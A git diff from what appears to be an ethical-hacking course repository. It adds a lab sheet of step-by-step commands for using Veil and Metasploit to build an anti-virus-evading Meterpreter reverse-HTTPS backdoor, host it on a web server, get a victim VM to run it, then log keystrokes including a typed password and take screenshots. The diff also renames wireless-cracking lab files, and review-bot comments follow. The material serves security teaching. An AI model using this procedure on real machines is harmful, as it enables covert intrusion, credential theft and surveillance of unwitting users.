diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt new file mode 100644 index 0000000..a9dc5e5 --- /dev/null +++ b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt 
@@ -0,0 +1,110 @@ +Using veil-framework to Create a Backdoor + +1. Introduction +Veil is a tool designed to generate metasploit payloads (Meterpreter) that bypass common anti-virus solutions. + +Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers +and is extended over the network at runtime. +It communicates over the stager socket and provides a comprehensive client-side Ruby API. +It features command history, tab completion, channels, and more. +Metepreter was originally written by skape for Metasploit 2.x, +common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3. + +Msfconsole handles the incoming connection. Msfconsole is a part of Metasploit Framework + +Reverse http: victim acts as client. Not the attack. Backdoor connect to me (attacker) to void anti-virus detection. + +2. Check environment setting up. My Window IP: 10.0.2.8 +ipconfig + +b. in Kali (Password: toor). My Kali IP: 10.0.2.7 +ifconfig + +3. Install Veil in Kali. You need to open a Kail Terminator +mkdir opt +cd opt +git clone https://github.com/Veil-Framework/Veil.git +cd Veil +cd setup +./setup.sh (enter "y" if asks) +(close the console) + +4. Attacker set payload options using Veil +(open the console) +cd /opt/Veil +./Veil.py (you should see the Veil interface now) +list (for two tools) +use 1 (using Evasion tool) +list (list all payloads) +use 15 (go/meterpreter/rev_https.py) +set LHOST 10.0.2.7 (this IP is my attack machine, I want the payload to talk to me, e.g., reverse http) +set LPORT 8080 (http port, don't use 80, avoid anti-virus program, sometime anti-virus scans the port) +set PROCESSORS 1 (make backdoor process 1) +set SLEEP 6 +options (see changed parameters) + +5. 
Attacker uses Veil to generate backdoor payload (executable) +generate (you should see interface) +rev_https_8080 (backdoor name to remember easily) +(generated file name: /usr/share/veil-output/compiled/rev_https_8080.exe) +(optional: https://nodistribute.com/ to check if the backdoor will be detected) +(close the console/Terminator) + +6. Attacker load the backdoor to website (On attacker's machine/Kali) +(open a file folder) +/ (allow you to type path) +/var/www/html +(create a folder evil-files) +(control-N to open another file window) +/usr/share/veil-output/compiled/ (you will see the backdoor file) +(copy the .exe file to evil-files folder) +(open Terminator) +service apache2 start (start the website) + +7. Attacker listening incoming connection (Sever/Attacker side/Kali) +(open another Terminator or split current Terminator) +msfconsole (you should see interface) +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_https (I will listen to the malicouse payload/program) +show options (see all parameters for the payload) +set LHOST 10.0.2.7 (this IP is my attack machine, I am waiting, e.g., reverse http) +set LPORT 8080 (http port, don't use 80, the same setting) +show options (see all parameters for the payload) +exploit (Now attacker is listening) + +8. Victim download the backdoor payload from the website (Window machine) +(open IE) +10.0.2.7/evil-files +(click the rev_https_8080.exe and run anyway) + +9. Access to victim’s machine +(enter, you will see msg promote again) +sessions -i +sessions -i 1 +sysinfo +ps +keyscan_start (enable key logger) +(in Window VM, open facebook, type your password) +keyscan_dump (what did you see?) 
+keyscan_stop +screenshot (what did you see) +(you will see victim connects to the attacker) +(restore snapshot) + + + + + + + + + + + +Reference +https://www.udemy.com/learn-social-engineering-from-scratch/ +https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/ +https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ +https://www.youtube.com/watch?v=W1rCVyGwKQ4 + + diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx new file mode 100644 index 0000000..55cdf53 Binary files /dev/null and b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx differ diff --git a/EthicalHacking/Labs/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/commands.txt b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/commands.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt 
diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hash b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hash rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack 
diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf diff --git a/EthicalHacking/Labs/WirelessWEPCracking/WEP_Cracking.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/WEP_Cracking.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx 
diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.cap b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.cap rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.csv b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.csv rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.csv b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.csv rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.netxml b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.netxml rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml diff --git a/EthicalHacking/Labs/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx 
diff --git a/EthicalHacking/Labs/WirelessWEPCracking_part2/arp_wep-01.cap b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking_part2/arp_wep-01.cap rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap diff --git a/EthicalHacking/Labs/WirelessWPA2Cracking/WEP_Cracking.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWPA2Cracking/WEP_Cracking.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx diff --git a/EthicalHacking/Labs/WirelessWPA2Cracking/mypasswordlist.txt b/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt similarity index 100% rename from EthicalHacking/Labs/WirelessWPA2Cracking/mypasswordlist.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt diff --git a/EthicalHacking/Labs/WirelessWPA2Cracking/wpa_handshakes-01.cap b/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap similarity index 100% rename from EthicalHacking/Labs/WirelessWPA2Cracking/wpa_handshakes-01.cap rename to EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap diff --git a/EthicalHacking/Labs/WirelessWPSCracking/WPS_Misconfig.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWPSCracking/WPS_Misconfig.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx diff --git a/EthicalHacking/Labs/WirelessWPSCracking/reaver b/EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/reaver similarity index 100% rename from EthicalHacking/Labs/WirelessWPSCracking/reaver rename to EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/reaver
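Review bot: in the Veil_Framework_commands.txt hunk, step 3 installs Veil into a relative directory (`mkdir opt` / `cd opt` run from wherever the terminal opened) but step 4 then does `cd /opt/Veil`, so the path will only exist if the shell happened to start at `/`; use `mkdir -p /opt && cd /opt` (or clone straight into `/opt/Veil`) in step 3 so both steps agree. Two explanations in the introduction are also wrong and will mislead students: a reverse HTTP(S) connection means the victim opens the outbound connection, which is what gets it through NAT and egress firewalls, it is not what evades anti-virus (that is the job of the Evasion tool chosen with `use 1`), and the `LPORT 8080` remark about anti-virus "scanning the port" repeats the same confusion; the real requirement is just that the handler's LHOST/LPORT match the payload's. Minor: "Metepreter", "Window IP", "Kail", "malicouse", "msg promote" and "Not the attack" are typos, and the bare `sessions -i` in step 9 needs the session id that the following `sessions -i 1` supplies, so one of the two lines should go.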
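Review bot: the rename target directory `wirelessHacking` is lower-camel while every sibling folder (`HackingIntoPC`, `WirelessUsingPMKID`, `WirelessWEPCracking`) is upper-camel; consider `WirelessHacking` for consistency. The deck moved to `WirelessWPA2Cracking/WEP_Cracking.pptx` keeps a WEP file name inside the WPA2 lab folder, which looks like a copy-paste leftover and should be renamed as part of the same move. The files `crack_PMKID/hash`, `hashtocrack` and `mac.txt` carry no extension or description; a short README in that folder saying which tool produced each one and what the cracking step consumes would make the lab self-explanatory.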